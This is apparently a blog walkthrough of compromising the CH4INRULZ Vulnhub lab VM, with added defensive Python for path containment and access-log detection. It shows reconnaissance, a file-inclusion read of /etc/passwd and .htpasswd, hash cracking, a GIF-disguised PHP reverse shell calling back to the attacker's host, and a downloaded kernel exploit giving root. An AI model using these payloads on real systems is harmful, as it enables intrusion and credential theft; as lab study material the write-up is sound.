VM - Cracking CH4INRULZ_v1.0.1
This article records my penetration-testing learning process against CH4INRULZ_v1.0.1; the VM under test comes from www.vulnhub.com
Blog collection: CTF-oriented VM cracking series
Download link: CH4INRULZ_v1.0.1
-
The system gets its address by DHCP, so the IP is unknown; netdiscover can be used to find it
root@kali:~# netdiscover -r 10.10.10.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 6 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 360
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 10.10.10.1      00:50:56:c0:00:08      2     120  VMware, Inc.
 10.10.10.2      00:50:56:fb:16:b2      1      60  VMware, Inc.
 10.10.10.168    00:0c:29:15:19:a3      2     120  VMware, Inc.
 10.10.10.254    00:50:56:e8:71:43      1      60  VMware, Inc.
-
The IP is found to be 10.10.10.168; next comes port discovery
root@kali:~# nmap -A 10.10.10.168 -p 1-65535 -T4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-04 22:53 EST
Nmap scan report for 10.10.10.168
Host is up (0.00039s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.5
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.10.166
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d4:f8:c1:55:92:75:93:f7:7b:65:dd:2b:94:e8:bb:47 (DSA)
|   2048 3d:24:ea:4f:a2:2a:ca:63:b7:f4:27:0f:d9:17:03:22 (RSA)
|_  256 e2:54:a7:c7:ef:aa:8c:15:61:20:bd:aa:72:c0:17:88 (ECDSA)
80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: FRANK's Website | Under development
8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:15:19:A3 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.19 - 2.6.36
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms 10.10.10.168

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.78 seconds
The scan reveals ports 21, 22, 80 and 8011; port 21 is examined first
PS C:\Users\John> ftp 10.10.10.168
連線到 10.10.10.168。
220 (vsFTPd 2.3.5)
200 Always in UTF8 mode.
使用者(10.10.10.168:(none)): Anonymous
331 Please specify the password.
密碼:
230 Login successful.
ftp>
ftp> ls -la
Nothing of value was found on the FTP server; in addition, no known vulnerability was found for this vsftpd version
root@kali:~# searchsploit vsftpd
--------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                             |  Path
                                                                           | (/usr/share/exploitdb/)
--------------------------------------------------------------------------- ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption             | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)             | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)             | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                                           | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                     | exploits/unix/remote/17491.rb
--------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~#
No version vulnerability was found for OpenSSH 5.9p1 Debian 5ubuntu1.10 on port 22 either
-
Next, test port 8011
Use dirb for directory brute-forcing
root@kali:~# dirb http://10.10.10.168:8011

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Mar  4 23:15:57 2019
URL_BASE: http://10.10.10.168:8011/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.168:8011/ ----
==> DIRECTORY: http://10.10.10.168:8011/api/
+ http://10.10.10.168:8011/index.html (CODE:200|SIZE:30)
+ http://10.10.10.168:8011/server-status (CODE:403|SIZE:295)

---- Entering directory: http://10.10.10.168:8011/api/ ----
+ http://10.10.10.168:8011/api/index.html (CODE:200|SIZE:351)

-----------------
END_TIME: Mon Mar  4 23:16:02 2019
DOWNLOADED: 9224 - FOUND: 3
Use nikto for vulnerability scanning
root@kali:~# nikto -C all -h 10.10.10.168:8011
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.168
+ Target Hostname:    10.10.10.168
+ Target Port:        8011
+ Start Time:         2019-03-04 23:16:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 1052109, size: 30, mtime: Sat Apr 14 08:00:08 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 26131 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2019-03-04 23:17:16 (GMT-5) (72 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Visiting the results of the scans above, http://10.10.10.168:8011/api/index.html contains hint text
Testing each of the four pages named in the hint, http://10.10.10.168:8011/api/files_api.php echoes output back, and the hint text mentions a file parameter
Next, test the file parameter to see whether it can be exploited, for example by visiting "http://10.10.10.168:8011/api/files_api.php?file=/etc/passwd"; the request is blocked, which suggests the parameter is exploitable here
Next, try testing from the command line
root@kali:~# curl -X POST -d "file=/etc/passwd" http://10.10.10.168:8011/api/files_api.php
<head>
<title>franks website | simple website browser API</title>
</head>
root:x:0:0:root:/root:/bin/bash
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
frank:x:1000:1000:frank,,,:/home/frank:/bin/bash
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:103:111:ftp daemon,,,:/srv/ftp:/bin/false
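As an added example (not code from the original post or from the CH4INRULZ VM), this is the containment check the file-browser API should have enforced on its file parameter: only paths that resolve inside the API's own directory are served, and they are served as opaque bytes rather than included. The directory layout and file names are constructed for illustration.

```python
import os
import tempfile

def resolve_safe_path(web_root, requested):
    """Return the real path of `requested` inside `web_root`, or None.

    Rejects empty and absolute paths, NUL bytes, and any result (after
    resolving ".." and symlinks) that lands outside the web root, so
    neither /etc/passwd nor a file in an uploads directory elsewhere on
    disk can be reached through the API.
    """
    if not requested or os.path.isabs(requested) or "\x00" in requested:
        return None
    root = os.path.realpath(web_root)
    target = os.path.realpath(os.path.join(root, requested))
    # commonpath is a true prefix test; startswith() would accept /var/www2
    if os.path.commonpath([root, target]) != root:
        return None
    return target if os.path.isfile(target) else None

def serve_file(web_root, requested):
    """Read the file as opaque bytes; never include() or execute it."""
    path = resolve_safe_path(web_root, requested)
    if path is None:
        return None
    with open(path, "rb") as fh:
        return fh.read()

def demo():
    """Constructed layout: an API root plus an uploads dir outside it."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "html", "api")
    os.makedirs(root)
    with open(os.path.join(root, "index.html"), "wb") as fh:
        fh.write(b"<title>simple website browser API</title>")
    uploads = os.path.join(base, "development", "uploader", "FRANKuploads")
    os.makedirs(uploads)
    with open(os.path.join(uploads, "upload.gif"), "wb") as fh:
        fh.write(b"GIF89a constructed placeholder")  # not a real image
    return {
        "index": serve_file(root, "index.html"),
        "passwd": resolve_safe_path(root, "/etc/passwd"),
        "htpasswd": resolve_safe_path(root, "../../../etc/.htpasswd"),
        "upload": resolve_safe_path(
            root, "../../development/uploader/FRANKuploads/upload.gif"),
        "missing": resolve_safe_path(root, "nope.html"),
    }
```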
-
Next, probe port 80
First use dirb to brute-force the site's directories
root@kali:~# dirb http://10.10.10.168

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Mar  4 23:06:36 2019
URL_BASE: http://10.10.10.168/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.168/ ----
+ http://10.10.10.168/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.168/css/
+ http://10.10.10.168/development (CODE:401|SIZE:479)
==> DIRECTORY: http://10.10.10.168/img/
+ http://10.10.10.168/index (CODE:200|SIZE:334)
+ http://10.10.10.168/index.html (CODE:200|SIZE:13516)
==> DIRECTORY: http://10.10.10.168/js/
+ http://10.10.10.168/LICENSE (CODE:200|SIZE:1093)
+ http://10.10.10.168/robots (CODE:200|SIZE:21)
+ http://10.10.10.168/robots.txt (CODE:200|SIZE:21)
+ http://10.10.10.168/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://10.10.10.168/vendor/

---- Entering directory: http://10.10.10.168/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.168/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.168/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.168/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Mar  4 23:06:39 2019
DOWNLOADED: 4612 - FOUND: 8
The directories cgi-bin, development, css, img, js and vendor are found; the key finding is the directory that requires password authentication (the back-end page)
root@kali:~# dirb http://10.10.10.168 | grep "CODE:401"
+ http://10.10.10.168/development (CODE:401|SIZE:479)
Then scan the site with nikto
root@kali:~# nikto -C all -h 10.10.10.168
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.168
+ Target Hostname:    10.10.10.168
+ Target Port:        80
+ Start Time:         2019-03-04 23:08:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 1051931, size: 13516, mtime: Sat Apr 14 09:39:32 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.html.bak
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 26280 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2019-03-04 23:09:13 (GMT-5) (69 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The img directory and the /icons/README file are found; in addition it reports that index has two variants: "index.html" and "index.html.bak"
Download this file:
root@kali:~# wget http://10.10.10.168/index.html.bak
--2019-03-04 23:36:01--  http://10.10.10.168/index.html.bak
Connecting to 10.10.10.168:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 334 [application/x-trash]
Saving to: ‘index.html.bak’

index.html.bak      100%[=============================================================================>]     334  --.-KB/s    in 0s

2019-03-04 23:36:01 (71.7 MB/s) - ‘index.html.bak’ saved [334/334]

root@kali:~# cat index.html.bak
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
<a href="/development">development</a>
<!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->
</body></html>
Looking at the contents, the username and password hash can be seen: frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
Alternatively, run the command
root@kali:~# curl -X POST -d "file=/etc/.htpasswd" http://10.10.10.168:8011/api/files_api.php
<head>
<title>franks website | simple website browser API</title>
</head>
frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
Brute-force the credential above:
frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
hash-identifier can be used to determine the hash type, then John the Ripper to brute-force it
root@kali:~# hash-identifier
   #########################################################################
   #   (hash-identifier banner)                                    v1.1   #
   #                                                        By Zion3R     #
   #                                               www.Blackploit.com     #
   #                                              Root@Blackploit.com     #
   #########################################################################
   -------------------------------------------------------------------------
 HASH: $apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

Possible Hashs:
[+] MD5(APR)
-------------------------------------------------------------------------
Then crack the password with john; john is used by copying the hash into a file and cracking that file
root@kali:~# cat hash.txt
frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
root@kali:~# john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Proceeding with single, rules:Wordlist
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 22 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 33 candidates buffered for the current salt, minimum 48 needed for performance.
frank!!!         (frank)
1g 0:00:00:00 DONE 1/3 (2019-03-05 00:05) 50.00g/s 9950p/s 9950c/s 9950C/s FRANK1..gfrank
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Now we have the credential frank:frank!!!; use it to log in to the development directory
The keyword uploader is found; try accessing it as a path
There is presumably a file-upload vulnerability; after logging in and testing, the upload turns out to accept only image formats
Find a PHP reverse-shell in Kali and try uploading it, formatted as an image with a GIF98 file header
root@kali:~# cat reerse_php.gif
GIF98
<?php
$sock=fsockopen("10.10.10.166",4444);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
Upload succeeded:
But even after a successful upload it cannot be used, so directory brute-forcing is tried again. The brute-force reveals another directory, "http://10.10.10.168/development/uploader/FRANKuploads/"
It is not known where FRANKuploads comes from; only one image was added, nothing else was changed.
Open a listening port in Kali, then access the reverse-shell image
root@kali:~# nc -nvlp 4444
retrying local 0.0.0.0:4444 : Address already in use
Open another window:
curl -X POST -d file=/var/www/development/uploader/FRANKuploads/reerse_php.gif 10.10.10.168:8011/api/files_api.php
The connection is established and then drops immediately, so the reverse webshell is judged to be the problem; therefore use the reverse shell shipped with Kali:
Modify /usr/share/webshells/php/php-reverse-shell.php: change its file header to GIF98 and its extension to gif, then upload it.
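As an added example (not part of the original post), here is detection logic a defender could run over the web server's access log to spot the activity described in this walkthrough: the dirb 404 burst, the Nikto scan, the index.html.bak download and POSTs to files_api.php. The log lines are constructed for this example; the scanner user-agent list and the 404 threshold are assumptions to tune per site.

```python
import re
from collections import Counter

# Constructed Apache combined-format lines modelled on this walkthrough.
SAMPLE_LOG = """\
10.10.10.166 - - [04/Mar/2019:23:06:36 -0500] "GET /cgi-bin/ HTTP/1.1" 403 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
10.10.10.166 - - [04/Mar/2019:23:06:36 -0500] "GET /admin HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
10.10.10.166 - - [04/Mar/2019:23:06:36 -0500] "GET /backup HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
10.10.10.166 - - [04/Mar/2019:23:06:37 -0500] "GET /config HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
10.10.10.166 - - [04/Mar/2019:23:06:37 -0500] "GET /development HTTP/1.1" 401 479 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
10.10.10.166 - - [04/Mar/2019:23:08:05 -0500] "GET /icons/README HTTP/1.1" 200 5108 "-" "Mozilla/5.00 (Nikto/2.1.6)"
10.10.10.166 - - [04/Mar/2019:23:36:01 -0500] "GET /index.html.bak HTTP/1.1" 200 334 "-" "Wget/1.20"
10.10.10.166 - - [05/Mar/2019:06:25:10 -0500] "POST /api/files_api.php HTTP/1.1" 200 1830 "-" "curl/7.64.0"
10.10.10.20 - - [05/Mar/2019:06:30:00 -0500] "GET /index.html HTTP/1.1" 200 13516 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)'
    r' [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

SCANNER_UA = ("nikto", "dirb", "gobuster", "sqlmap")   # assumption: tune
BACKUP_SUFFIXES = (".bak", ".old", ".orig", "~", ".swp")
NOT_FOUND_THRESHOLD = 3  # assumption: set from the site's normal 404 rate

def parse(line):
    """Parse one combined-format line into a dict, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyse(log_text):
    """Return a list of (rule, client_ip, detail) findings."""
    findings = []
    not_found = Counter()
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ip, path, status, ua = rec["ip"], rec["path"], rec["status"], rec["ua"]
        if any(s in ua.lower() for s in SCANNER_UA):
            findings.append(("scanner-user-agent", ip, ua))
        if status == "404":
            not_found[ip] += 1
        # MultiViews served index.html.bak in this box; a 200 on a backup
        # suffix means a leftover file is exposed.
        if status == "200" and path.lower().endswith(BACKUP_SUFFIXES):
            findings.append(("backup-file-served", ip, path))
        if rec["method"] == "POST" and path.endswith("/files_api.php"):
            findings.append(("file-browser-api-post", ip, path))
    for ip, n in not_found.items():
        if n >= NOT_FOUND_THRESHOLD:
            findings.append(("directory-bruteforce", ip, f"{n} x 404"))
    return findings
```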
-
Reverse shell
Use msf or nc to listen on port 4444; set the reverse shell's port to 4444 and listen
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
Access it from a new window
root@kali:~/Desktop# curl -X POST -d file=/var/www/development/uploader/FRANKuploads/php-reverse-shell4.gif 10.10.10.168:8011/api/files_api.php
Shell obtained
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.168] 37548
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
 06:26:47 up  2:36,  0 users,  load average: 0.00, 0.01, 1.64
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
Switch to bash
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
-
Privilege escalation
Check the kernel version
www-data@ubuntu:/home/frank$ uname -a
uname -a
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
Search for vulnerabilities for this kernel version
root@kali:~# searchsploit linux 2.6.35
--------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                             |  Path
                                                                           | (/usr/share/exploitdb/)
--------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service           | exploits/linux/dos/36425.txt
--------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Set up a simple HTTP server in Kali
root@kali:/var/www/html# python -m SimpleHTTPServer 80
Run the commands on the target machine
www-data@ubuntu:/var/www$ cd /var/tmp
cd /var/tmp
www-data@ubuntu:/var/tmp$ wget http://10.10.10.166/15285.c
wget http://10.10.10.166/15285.c
--2019-03-05 06:51:42--  http://10.10.10.166/15285.c
Connecting to 10.10.10.166:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7155 (7.0K) [text/x-csrc]
Saving to: `15285.c'

100%[======================================>] 7,155       --.-K/s   in 0s

2019-03-05 06:51:42 (68.9 MB/s) - `15285.c' saved [7155/7155]

www-data@ubuntu:/var/tmp$ ls
ls
15285.c
www-data@ubuntu:/var/tmp$ ls
ls
15285.c
www-data@ubuntu:/var/tmp$ gcc 15285.c -o 15285
gcc 15285.c -o 15285
www-data@ubuntu:/var/tmp$ chmod 777 15285
chmod 777 15285
www-data@ubuntu:/var/tmp$ ./15285
./15285
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xffffffff81ce8df0
 [+] Resolved default_security_ops to 0xffffffff81a523e0
 [+] Resolved cap_ptrace_traceme to 0xffffffff8125db60
 [+] Resolved commit_creds to 0xffffffff810852b0
 [+] Resolved prepare_kernel_cred to 0xffffffff81085780
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
#
# python -c 'import pty; pty.spawn("/bin/bash")'
root@ubuntu:/var/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
At this point, the box is done.